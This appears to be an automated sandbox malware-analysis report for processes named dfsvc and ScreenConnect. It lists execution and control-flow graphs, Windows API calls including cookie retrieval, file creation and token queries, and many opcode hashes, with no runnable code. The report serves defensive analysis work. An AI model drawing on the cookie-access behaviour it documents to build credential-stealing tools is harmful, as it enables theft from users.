                                                                                                                                                                                                                                                          execution_graph 42592 7ff887f49a0a 42593 7ff887f49a0f CreateFileW 42592->42593 42595 7ff887f49b2c 42593->42595 42596 7ff887f7ac12 42597 7ff887f7ac15 42596->42597 42599 7ff887f7af42 42597->42599 42601 7ff887f41608 42597->42601 42600 7ff887f7b102 42603 7ff887f41611 42601->42603 42602 7ff887f41683 42602->42600 42603->42602 42604 7ff887f41802 LoadLibraryExW 42603->42604 42605 7ff887f41836 42604->42605 42605->42600 42606 7ff887f51212 42607 7ff887f51240 InternetGetCookieW 42606->42607 42609 7ff887f51409 42607->42609
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2497062115.00007FF887F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F40000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff887f40000_dfsvc.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: N
                                                                                                                                                                                                                                                          • API String ID: 0-1130791706
                                                                                                                                                                                                                                                          • Opcode ID: d7d9e655cb69d9119e6986f32b453772976067ebe9ba7ef5c1b4dc6e6e3b2c3e
                                                                                                                                                                                                                                                          • Instruction ID: 3db4787a9ed248810aad6f846a19fdbc0a4cc25f31457cb1c12644ea134eaa18
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7d9e655cb69d9119e6986f32b453772976067ebe9ba7ef5c1b4dc6e6e3b2c3e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D571E771E8CA8E5FE749DB6C84196BD7BE1FF56350F0841BAD00DD7292DE28A805C741
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2497062115.00007FF887F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F40000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff887f40000_dfsvc.jbxd
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2497062115.00007FF887F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F40000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff887f40000_dfsvc.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CookieInternet
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 930238652-0
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2497062115.00007FF887F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F40000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff887f40000_dfsvc.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2497062115.00007FF887F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F40000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff887f40000_dfsvc.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2496540444.00007FF887E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E2D000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff887e2d000_dfsvc.jbxd

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:12.4%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                          Total number of Nodes:14
                                                                                                                                                                                                                                                          Total number of Limit Nodes:1
                                                                                                                                                                                                                                                          execution_graph 14138 7ff887f2f67b 14139 7ff887f2f687 CreateFileW 14138->14139 14141 7ff887f2f7bc 14139->14141 14147 7ff887f3f219 14148 7ff887f3f223 GetTokenInformation 14147->14148 14150 7ff887f3f2d7 14148->14150 14151 7ff887f3f458 14152 7ff887f3f46f CloseHandle 14151->14152 14154 7ff887f3f4eb 14152->14154 14142 7ff887f28414 14144 7ff887f2841d 14142->14144 14143 7ff887f28482 14144->14143 14145 7ff887f284f6 SetProcessMitigationPolicy 14144->14145 14146 7ff887f28552 14145->14146

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1833592850.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff887f20000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1088084561-0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 1176 7ff887f2f67b-7ff887f2f710 1181 7ff887f2f71a-7ff887f2f7ba CreateFileW 1176->1181 1182 7ff887f2f712-7ff887f2f717 1176->1182 1184 7ff887f2f7bc 1181->1184 1185 7ff887f2f7c2-7ff887f2f7f5 1181->1185 1182->1181 1184->1185
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1833592850.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff887f20000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 823142352-0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 1277 7ff887f3f219-7ff887f3f2d5 GetTokenInformation 1280 7ff887f3f2dd-7ff887f3f30e 1277->1280 1281 7ff887f3f2d7 1277->1281 1281->1280
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1833592850.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff887f20000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InformationToken
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4114910276-0
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1833592850.00007FF887F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887F20000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff887f20000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: nCq$
                                                                                                                                                                                                                                                          • API String ID: 0-415435924
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: t*s$t*s
                                                                                                                                                                                                                                                          • API String ID: 0-800204968
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ['
                                                                                                                                                                                                                                                          • API String ID: 0-410297704
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: t*s
                                                                                                                                                                                                                                                          • API String ID: 0-1920582113
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                                                          • API String ID: 0-3372436214
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
Memory Dump Source
• Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a9b7e751116a2543afb2fe7bf198da17def5cdf19df85a34750fa820d983377a
                                                                                                                                                                                                                                                          • Instruction ID: 13e66fc19376f4a5fc2353cf1beaf44832b9afd7e1c5b7bf6bcc70b49c0c4385
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9b7e751116a2543afb2fe7bf198da17def5cdf19df85a34750fa820d983377a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D51DD30A002149FDB249BA5D858BAEBBF6FF84714F14D52AE807DB394DB719C44CBA0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 9ceb12d7b716154f14034062d384233c13d108ab1e8f8abb705444ae382f6e74
                                                                                                                                                                                                                                                          • Instruction ID: f03996cae50cfa49a271fed826c704bd144fc99490e8416141d240a1e2ef6865
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ceb12d7b716154f14034062d384233c13d108ab1e8f8abb705444ae382f6e74
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE516CB4600705CFCF24CF39D845AAAB7F2FB84225B149A69E456977A0DB30E846CB90
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f3f5c6fc2b7bd08a69d78ba957d5bf930d081a9c616a6b02b2e6eb998e56585e
                                                                                                                                                                                                                                                          • Instruction ID: 8489ed23a3d6659352e5211cee3cc8d4ed83e30c3a800befeeb188c2beb5dc37
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3f5c6fc2b7bd08a69d78ba957d5bf930d081a9c616a6b02b2e6eb998e56585e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6951FA34600701CFCB24CF65D894A56B7F2FF8D628B149A5CD49B9B7A4EB31E805CB54
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a0377e7df2b9eeb007a5652b2daa580fe5dae0ca2cda82e9ee6f3d763a6b882d
                                                                                                                                                                                                                                                          • Instruction ID: ca551f90863a357e814ad6aae2d297f44b4194fcb8c8770ddb29669fe94443ed
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0377e7df2b9eeb007a5652b2daa580fe5dae0ca2cda82e9ee6f3d763a6b882d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B516970A003099BDB01DFB4E854BDDBBB2FF89310F108569E505BB290EB78A945CF64
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f239a6535545f6db572c8cf3a5278cc7d27fc8bfbc7086e7c2be18708f3cadbe
                                                                                                                                                                                                                                                          • Instruction ID: 6a45c70c8eb1df45ad528b820b0cb8355fe0ebb3759719737e8955885a08635c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f239a6535545f6db572c8cf3a5278cc7d27fc8bfbc7086e7c2be18708f3cadbe
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16419030B00605CBDF15EF64E8946AEBBB6FF84324B14C569D9069B285DF74EC06CBA1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 256d81432e1bdec2941edce39637556bd1fa4f9e1900bc7d0234509dc241249f
                                                                                                                                                                                                                                                          • Instruction ID: d5f18a0b5fea7fded1c09608c3e8de96b66bef1491b0433d2e73c4961c9c719f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 256d81432e1bdec2941edce39637556bd1fa4f9e1900bc7d0234509dc241249f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D416A307102159FDB68DF69D854AADBBF6BF89620B14916DE806E73A0DF709C04CB90
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a50bca9ba8ec2f3e73900c60c008c861f5103926ccca8d761362abcbd3127cfa
                                                                                                                                                                                                                                                          • Instruction ID: 080626c22047e25736ce92c950599a47b68e224afd4180e59f82aa4d1326bfeb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a50bca9ba8ec2f3e73900c60c008c861f5103926ccca8d761362abcbd3127cfa
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39414AB4600705CFCB24DF39D845AAAB7F2FF48325B149A68E4579B7A0DB30E845CB90
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a9a5f0a8f1f74573c98d6479037bdfe01124d3a250da5a3fafbc497fc321f618
                                                                                                                                                                                                                                                          • Instruction ID: e38314a8702d4ce8a83dec3595824419f6b38bd130c3732630d49eff4a8a4254
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9a5f0a8f1f74573c98d6479037bdfe01124d3a250da5a3fafbc497fc321f618
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9316F31B502058BDF14EE69C4946BFF7F5EF8A254F0494AAE406E7360DB709C018B90
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
Memory Dump Source
• Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a6108ed3fb0bf633d8692f8b2c02e1ef0df70536638e83cb2810d3f66ab5cb00
                                                                                                                                                                                                                                                          • Instruction ID: 68c8208df066308aab3781ac77fe32ea3fc19481308df730a31e0d5acfd0266c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6108ed3fb0bf633d8692f8b2c02e1ef0df70536638e83cb2810d3f66ab5cb00
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D321F33394E3C44FC71A8631AC472E97F24DE8367932D80CFD1858B2A7C65A4986C782
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 8be932c3d4fc3c04e85c39a39ace04fb8a36cfe7addfef7fbb9cff91b36e446e
                                                                                                                                                                                                                                                          • Instruction ID: a52ee580fc6f0e52ea0ab837bb9c21c694f94595a6588760a6eb71ec10ce9489
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8be932c3d4fc3c04e85c39a39ace04fb8a36cfe7addfef7fbb9cff91b36e446e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A3116706007058FCB34CF29D884A6AB7F2BF89629B549A2CD496DB7A0D730E905CB91
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3ce84f26fd1d1e2343d19efaf8de554bce345898decc50e655c5402c7f5132b8
                                                                                                                                                                                                                                                          • Instruction ID: 23c58753d489d04dadc72f77df53fb36ee3a5fd7f3851af98aaf0903a53cc16f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ce84f26fd1d1e2343d19efaf8de554bce345898decc50e655c5402c7f5132b8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA1103313406005BCB20865A9D51A57BBEBEFC1668F68C929F05ACB242EF20EC01C791
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5a5f432ef427a18f7ad62ea5a25d1877673c494d473046e63d91a77c4f263e9e
                                                                                                                                                                                                                                                          • Instruction ID: ac344d10848bf674fc5f660f1828cbb31a61f2f5e30f5fe5c76672f05e99b176
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a5f432ef427a18f7ad62ea5a25d1877673c494d473046e63d91a77c4f263e9e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED21C3317102055BDB14DB68DC517AE7BE2FBC9610F44852AD5059B340DF346C05CBE9
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a1e43277739fc22fb25d272b5edd3c3959a7d2c720cab23bf07369b3e7402050
                                                                                                                                                                                                                                                          • Instruction ID: 74d4f30237020293d216686e181b4a6b14dbe73b6458a28597e30324741e1733
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1e43277739fc22fb25d272b5edd3c3959a7d2c720cab23bf07369b3e7402050
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 642119702006058FDB35CF26D84869AB7F1AF85324B109A2DD497976E1DB31E94ACFA0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 00eeef4473f08088996a3aa2b7e4f55dc2c3fb5d5aa4d1e052834aadc36ad626
                                                                                                                                                                                                                                                          • Instruction ID: 95c66925f1c68ec846e6221874480c30fe5e16a922a8ab90eb7a8bc8a41aa1c2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00eeef4473f08088996a3aa2b7e4f55dc2c3fb5d5aa4d1e052834aadc36ad626
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D811E2317102156BEB18EB68DC80BAE77E3FBC9620F448529E505AB344DF30AC05CBE9
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 9256cf0252a6c53cd568c68258421072207637230cc65215a99b9b3fab72378e
                                                                                                                                                                                                                                                          • Instruction ID: 07aef2108c2afc3a158945cb9f058a8668fa95533e4d57b0a051398fa955a966
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9256cf0252a6c53cd568c68258421072207637230cc65215a99b9b3fab72378e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7114F369002099FCF00DFA4CD80ADEBBF5FB49304F108569E508BB250E731BA0ACBA0
                                                                                                                                                                                                                                                          Memory Dump Source
